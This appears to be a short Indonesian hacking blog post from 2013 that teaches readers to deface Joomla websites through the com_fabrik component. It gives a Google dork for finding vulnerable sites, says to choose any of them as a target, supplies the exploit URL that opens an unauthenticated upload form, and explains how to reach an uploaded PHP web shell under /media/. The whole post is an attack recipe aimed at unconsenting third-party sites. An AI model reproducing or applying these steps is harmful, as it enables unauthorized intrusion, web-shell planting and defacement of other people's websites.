December 20, 2013
kemaren kan udah tuh deface dengan com_smartformer. nah sekarang kita akan pake tekhnik yang lain lagi, tapi mirip dengan com_smartformer, namanya adalah com_fabrik, tekhnik ini sama sama pake upload shell ya, berikut langkah-langkahnya.
1. Ketik dork berikut ke google : inurl:index.php?option=com_fabrik
2. Akan ada banyak web, anda buka terserah yang mana
3. Masukkan exploit ini : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini
6. Jika berhasil, buka shell anda dengan format www.site.com/media/namashell.php
7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.
